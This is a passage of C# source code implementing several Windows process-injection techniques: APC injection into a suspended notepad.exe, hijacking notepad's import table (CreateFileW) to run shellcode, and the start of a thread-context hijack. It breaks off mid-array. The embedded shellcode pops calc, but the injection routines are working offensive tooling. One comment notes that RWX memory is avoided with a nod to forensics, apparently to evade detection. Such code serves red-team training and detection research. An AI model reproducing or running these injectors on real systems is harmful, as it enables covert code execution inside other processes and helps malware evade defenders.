0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
};
// Target process to inject into
string processpath = @"C:\Windows\notepad.exe";
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// Create new process in suspended state to inject into
bool success = CreateProcess(processpath, null,
IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED,
IntPtr.Zero, null, ref si, out pi);
// Allocate memory within process and write shellcode
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);
// Open thread
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
uint oldProtect = 0;
// Modify memory permissions on allocated shellcode
resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect);
// Assign address of shellcode to the target thread apc queue
IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
ResumeThread(ThreadHandle);
}
private static UInt32 MEM_COMMIT = 0x1000;
//private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR ;-)
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE_READ = 0x20;
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
DuplicateHandle = 0x00000040,
CreateProcess = 0x000000080,
SetQuota = 0x00000100,
SetInformation = 0x00000200,
QueryInformation = 0x00000400,
QueryLimitedInformation = 0x00001000,
Synchronize = 0x00100000
}
[Flags]
public enum ProcessCreationFlags : uint
{
ZERO_FLAG = 0x00000000,
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
CREATE_NEW_CONSOLE = 0x00000010,
CREATE_NEW_PROCESS_GROUP = 0x00000200,
CREATE_NO_WINDOW = 0x08000000,
CREATE_PROTECTED_PROCESS = 0x00040000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
CREATE_SEPARATE_WOW_VDM = 0x00001000,
CREATE_SHARED_WOW_VDM = 0x00001000,
CREATE_SUSPENDED = 0x00000004,
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
DEBUG_PROCESS = 0x00000001,
DETACHED_PROCESS = 0x00000008,
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
INHERIT_PARENT_AFFINITY = 0x00010000
}
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
public struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[Flags]
public enum ThreadAccess : int
{
TERMINATE = (0x0001) ,
SUSPEND_RESUME = (0x0002) ,
GET_CONTEXT = (0x0008) ,
SET_CONTEXT = (0x0010) ,
SET_INFORMATION = (0x0020) ,
QUERY_INFORMATION = (0x0040) ,
SET_THREAD_TOKEN = (0x0080) ,
IMPERSONATE = (0x0100) ,
DIRECT_IMPERSONATION = (0x0200)
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
int dwThreadId);
[DllImport("kernel32.dll",SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
int nSize,
out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
Int32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true )]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(
ProcessAccessFlags processAccess,
bool bInheritHandle,
int processId
);
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll")]
public static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32.dll")]
public static extern uint SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
int dwSize, uint flNewProtect, out uint lpflOldProtect);
}
public class IatInjection
{
public static void Inject()
{
string targetProcName = "notepad";
string targetFuncName = "CreateFileW";
// Get target process id and read memory contents
Process process = Process.GetProcessesByName(targetProcName)[0];
IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, process.Id);
int bytesRead = 0;
byte[] fileBytes = new byte[process.WorkingSet64];
ReadProcessMemory(hProcess, process.MainModule.BaseAddress, fileBytes, fileBytes.Length, ref bytesRead);
// The DOS header
IMAGE_DOS_HEADER dosHeader;
// The file header
IMAGE_FILE_HEADER fileHeader;
// Optional 32 bit file header
IMAGE_OPTIONAL_HEADER32 optionalHeader32 = new IMAGE_OPTIONAL_HEADER32();
// Optional 64 bit file header
IMAGE_OPTIONAL_HEADER64 optionalHeader64 = new IMAGE_OPTIONAL_HEADER64();
// Image Section headers
IMAGE_SECTION_HEADER[] imageSectionHeaders;
// Import descriptor for each DLL
IMAGE_IMPORT_DESCRIPTOR[] importDescriptors;
// Convert file bytes to memorystream and use reader
MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length);
BinaryReader reader = new BinaryReader(stream);
//Begin parsing structures
dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
// Add 4 bytes to the offset
stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
UInt32 ntHeadersSignature = reader.ReadUInt32();
fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
if (Is32BitHeader(fileHeader))
{
optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
}
else
{
optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
}
imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
{
imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
}
// Go to ImportTable and parse every imported DLL
stream.Seek((long)((ulong)optionalHeader64.ImportTable.VirtualAddress), SeekOrigin.Begin);
importDescriptors = new IMAGE_IMPORT_DESCRIPTOR[50];
for (int i = 0; i < 50; i++)
{
importDescriptors[i] = FromBinaryReader<IMAGE_IMPORT_DESCRIPTOR>(reader);
}
bool flag = false;
int j = 0;
// The below is really hacky, would have been better to use structures!
while (j < importDescriptors.Length && !flag)
{
for (int k = 0; k < 1000; k++)
{
// Get the address for the function and its name
stream.Seek(importDescriptors[j].OriginalFirstThunk + (k * 8), SeekOrigin.Begin);
long nameOffset = reader.ReadInt64();
if (nameOffset > 1000000 || nameOffset < 0)
{
break;
}
// Get the function name
stream.Seek(nameOffset + 2, SeekOrigin.Begin);
List<string> list = new List<string>();
byte[] array;
do
{
array = reader.ReadBytes(1);
list.Add(Encoding.Default.GetString(array));
}
while (array[0] != 0);
string curFuncName = string.Join(string.Empty, list.ToArray());
curFuncName = curFuncName.Substring(0, curFuncName.Length - 1);
// Get the offset of the pointer to the target function and its current value
long funcOffset = importDescriptors[j].FirstThunk + (k * 8);
stream.Seek(funcOffset, SeekOrigin.Begin);
long curFuncAddr = reader.ReadInt64();
// Found target function, modify address to point to shellcode
if (curFuncName == targetFuncName)
{
// WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
// nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
byte[] payload = new byte[111] {
0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58
};
// Once shellcode has executed go to real import (mov to rax then jmp to address)
byte[] mov_rax = new byte[2] {
0x48, 0xb8
};
byte[] jmp_address = BitConverter.GetBytes(curFuncAddr);
byte[] jmp_rax = new byte[2] {
0xff, 0xe0
};
// Build shellcode
byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
payload.CopyTo(shellcode, 0);
mov_rax.CopyTo(shellcode, payload.Length);
jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
// Allocate memory for shellcode
IntPtr shellcodeAddress = VirtualAllocEx(hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write shellcode to memory
IntPtr shellcodeBytesWritten = IntPtr.Zero;
WriteProcessMemory(hProcess,shellcodeAddress,shellcode,shellcode.Length, out shellcodeBytesWritten);
long funcAddress = (long)optionalHeader64.ImageBase + funcOffset;
// Get current value of IAT
bytesRead = 0;
byte[] buffer1 = new byte[8];
ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer1, buffer1.Length, ref bytesRead);
// Get shellcode address
byte[] shellcodePtr = BitConverter.GetBytes((Int64)shellcodeAddress);
// Modify permissions to allow IAT modification
uint oldProtect = 0;
bool protectbool = VirtualProtectEx(hProcess, (IntPtr)funcAddress, shellcodePtr.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
// Modfiy IAT to point to shellcode
IntPtr iatBytesWritten = IntPtr.Zero;
bool success = WriteProcessMemory(hProcess, (IntPtr)funcAddress, shellcodePtr, shellcodePtr.Length, out iatBytesWritten);
// Read IAT to confirm new value
bytesRead = 0;
byte[] buffer = new byte[8];
ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer, buffer.Length, ref bytesRead);
flag = true;
break;
}
}
j++;
}
}
public struct IMAGE_DOS_HEADER
{ // DOS .EXE header
public UInt16 e_magic; // Magic number
public UInt16 e_cblp; // Bytes on last page of file
public UInt16 e_cp; // Pages in file
public UInt16 e_crlc; // Relocations
public UInt16 e_cparhdr; // Size of header in paragraphs
public UInt16 e_minalloc; // Minimum extra paragraphs needed
public UInt16 e_maxalloc; // Maximum extra paragraphs needed
public UInt16 e_ss; // Initial (relative) SS value
public UInt16 e_sp; // Initial SP value
public UInt16 e_csum; // Checksum
public UInt16 e_ip; // Initial IP value
public UInt16 e_cs; // Initial (relative) CS value
public UInt16 e_lfarlc; // File address of relocation table
public UInt16 e_ovno; // Overlay number
public UInt16 e_res_0; // Reserved words
public UInt16 e_res_1; // Reserved words
public UInt16 e_res_2; // Reserved words
public UInt16 e_res_3; // Reserved words
public UInt16 e_oemid; // OEM identifier (for e_oeminfo)
public UInt16 e_oeminfo; // OEM information; e_oemid specific
public UInt16 e_res2_0; // Reserved words
public UInt16 e_res2_1; // Reserved words
public UInt16 e_res2_2; // Reserved words
public UInt16 e_res2_3; // Reserved words
public UInt16 e_res2_4; // Reserved words
public UInt16 e_res2_5; // Reserved words
public UInt16 e_res2_6; // Reserved words
public UInt16 e_res2_7; // Reserved words
public UInt16 e_res2_8; // Reserved words
public UInt16 e_res2_9; // Reserved words
public UInt32 e_lfanew; // File address of new exe header
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DATA_DIRECTORY
{
public UInt32 VirtualAddress;
public UInt32 Size;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_OPTIONAL_HEADER32
{
public UInt16 Magic;
public Byte MajorLinkerVersion;
public Byte MinorLinkerVersion;
public UInt32 SizeOfCode;
public UInt32 SizeOfInitializedData;
public UInt32 SizeOfUninitializedData;
public UInt32 AddressOfEntryPoint;
public UInt32 BaseOfCode;
public UInt32 BaseOfData;
public UInt32 ImageBase;
public UInt32 SectionAlignment;
public UInt32 FileAlignment;
public UInt16 MajorOperatingSystemVersion;
public UInt16 MinorOperatingSystemVersion;
public UInt16 MajorImageVersion;
public UInt16 MinorImageVersion;
public UInt16 MajorSubsystemVersion;
public UInt16 MinorSubsystemVersion;
public UInt32 Win32VersionValue;
public UInt32 SizeOfImage;
public UInt32 SizeOfHeaders;
public UInt32 CheckSum;
public UInt16 Subsystem;
public UInt16 DllCharacteristics;
public UInt32 SizeOfStackReserve;
public UInt32 SizeOfStackCommit;
public UInt32 SizeOfHeapReserve;
public UInt32 SizeOfHeapCommit;
public UInt32 LoaderFlags;
public UInt32 NumberOfRvaAndSizes;
public IMAGE_DATA_DIRECTORY ExportTable;
public IMAGE_DATA_DIRECTORY ImportTable;
public IMAGE_DATA_DIRECTORY ResourceTable;
public IMAGE_DATA_DIRECTORY ExceptionTable;
public IMAGE_DATA_DIRECTORY CertificateTable;
public IMAGE_DATA_DIRECTORY BaseRelocationTable;
public IMAGE_DATA_DIRECTORY Debug;
public IMAGE_DATA_DIRECTORY Architecture;
public IMAGE_DATA_DIRECTORY GlobalPtr;
public IMAGE_DATA_DIRECTORY TLSTable;
public IMAGE_DATA_DIRECTORY LoadConfigTable;
public IMAGE_DATA_DIRECTORY BoundImport;
public IMAGE_DATA_DIRECTORY IAT;
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_OPTIONAL_HEADER64
{
public UInt16 Magic;
public Byte MajorLinkerVersion;
public Byte MinorLinkerVersion;
public UInt32 SizeOfCode;
public UInt32 SizeOfInitializedData;
public UInt32 SizeOfUninitializedData;
public UInt32 AddressOfEntryPoint;
public UInt32 BaseOfCode;
public UInt64 ImageBase;
public UInt32 SectionAlignment;
public UInt32 FileAlignment;
public UInt16 MajorOperatingSystemVersion;
public UInt16 MinorOperatingSystemVersion;
public UInt16 MajorImageVersion;
public UInt16 MinorImageVersion;
public UInt16 MajorSubsystemVersion;
public UInt16 MinorSubsystemVersion;
public UInt32 Win32VersionValue;
public UInt32 SizeOfImage;
public UInt32 SizeOfHeaders;
public UInt32 CheckSum;
public UInt16 Subsystem;
public UInt16 DllCharacteristics;
public UInt64 SizeOfStackReserve;
public UInt64 SizeOfStackCommit;
public UInt64 SizeOfHeapReserve;
public UInt64 SizeOfHeapCommit;
public UInt32 LoaderFlags;
public UInt32 NumberOfRvaAndSizes;
public IMAGE_DATA_DIRECTORY ExportTable;
public IMAGE_DATA_DIRECTORY ImportTable;
public IMAGE_DATA_DIRECTORY ResourceTable;
public IMAGE_DATA_DIRECTORY ExceptionTable;
public IMAGE_DATA_DIRECTORY CertificateTable;
public IMAGE_DATA_DIRECTORY BaseRelocationTable;
public IMAGE_DATA_DIRECTORY Debug;
public IMAGE_DATA_DIRECTORY Architecture;
public IMAGE_DATA_DIRECTORY GlobalPtr;
public IMAGE_DATA_DIRECTORY TLSTable;
public IMAGE_DATA_DIRECTORY LoadConfigTable;
public IMAGE_DATA_DIRECTORY BoundImport;
public IMAGE_DATA_DIRECTORY IAT;
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_FILE_HEADER
{
public UInt16 Machine;
public UInt16 NumberOfSections;
public UInt32 TimeDateStamp;
public UInt32 PointerToSymbolTable;
public UInt32 NumberOfSymbols;
public UInt16 SizeOfOptionalHeader;
public UInt16 Characteristics;
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_SECTION_HEADER
{
[FieldOffset(0)]
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public char[] Name;
[FieldOffset(8)]
public UInt32 VirtualSize;
[FieldOffset(12)]
public UInt32 VirtualAddress;
[FieldOffset(16)]
public UInt32 SizeOfRawData;
[FieldOffset(20)]
public UInt32 PointerToRawData;
[FieldOffset(24)]
public UInt32 PointerToRelocations;
[FieldOffset(28)]
public UInt32 PointerToLinenumbers;
[FieldOffset(32)]
public UInt16 NumberOfRelocations;
[FieldOffset(34)]
public UInt16 NumberOfLinenumbers;
[FieldOffset(36)]
public DataSectionFlags Characteristics;
public string Section
{
get { return new string(Name); }
}
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_IMPORT_DESCRIPTOR
{
public uint OriginalFirstThunk;
public uint TimeDateStamp;
public uint ForwarderChain;
public uint Name;
public uint FirstThunk;
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_BASE_RELOCATION
{
public uint VirtualAdress;
public uint SizeOfBlock;
}
[Flags]
public enum DataSectionFlags : uint
{
Stub = 0x00000000,
}
public static T FromBinaryReader<T>(BinaryReader reader)
{
// Read in a byte array
byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
// Pin the managed memory while, copy it out the data, then unpin it
GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
handle.Free();
return theStructure;
}
public static bool Is32BitHeader(IMAGE_FILE_HEADER fileHeader)
{
UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
return (IMAGE_FILE_32BIT_MACHINE & fileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
}
// Process privileges
public const int PROCESS_CREATE_THREAD = 0x0002;
public const int PROCESS_QUERY_INFORMATION = 0x0400;
public const int PROCESS_VM_OPERATION = 0x0008;
public const int PROCESS_VM_WRITE = 0x0020;
public const int PROCESS_VM_READ = 0x0010;
public const int PROCESS_ALL_ACCESS = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
// Memory permissions
public const uint MEM_COMMIT = 0x00001000;
public const uint MEM_RESERVE = 0x00002000;
public const uint PAGE_READWRITE = 0x04;
public const uint PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
}
public class ThreadHijack
{
// Import API Functions
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
[DllImport("kernel32.dll")]
static extern uint SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
[DllImport("kernel32.dll")]
static extern int ResumeThread(IntPtr hThread);
[DllImport("kernel32", CharSet = CharSet.Auto,SetLastError = true)]
static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
// Process privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
// Memory permissions
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
const uint PAGE_EXECUTE_READWRITE = 0x40;
[Flags]
public enum ThreadAccess : int
{
TERMINATE = (0x0001),
SUSPEND_RESUME = (0x0002),
GET_CONTEXT = (0x0008),
SET_CONTEXT = (0x0010),
SET_INFORMATION = (0x0020),
QUERY_INFORMATION = (0x0040),
SET_THREAD_TOKEN = (0x0080),
IMPERSONATE = (0x0100),
DIRECT_IMPERSONATION = (0x0200),
THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
}
public enum CONTEXT_FLAGS : uint
{
CONTEXT_i386 = 0x10000,
CONTEXT_i486 = 0x10000, // same as i386
CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
}
// x86 float save
[StructLayout(LayoutKind.Sequential)]
public struct FLOATING_SAVE_AREA
{
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
}
// x86 context structure (not used in this example)
[StructLayout(LayoutKind.Sequential)]
public struct CONTEXT
{
public uint ContextFlags; //set this to an appropriate value
// Retrieved by CONTEXT_DEBUG_REGISTERS
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
// Retrieved by CONTEXT_FLOATING_POINT
public FLOATING_SAVE_AREA FloatSave;
// Retrieved by CONTEXT_SEGMENTS
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
// Retrieved by CONTEXT_INTEGER
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
// Retrieved by CONTEXT_CONTROL
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
// Retrieved by CONTEXT_EXTENDED_REGISTERS
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] ExtendedRegisters;
}
// x64 m128a
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
// x64 save format
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
// x64 context structure
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT64
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
public static int Inject()
{
// Get target process by name
Process targetProcess = Process.GetProcessesByName("notepad")[0];
// Open and Suspend first thread
ProcessThread pT = targetProcess.Threads[0];
IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
SuspendThread(pOpenThread);
// Get thread context
CONTEXT64 tContext = new CONTEXT64();
tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
if (GetThreadContext(pOpenThread, ref tContext))
{
}
// WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
// Compiled with:
// nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
byte[] payload = new byte[112] {
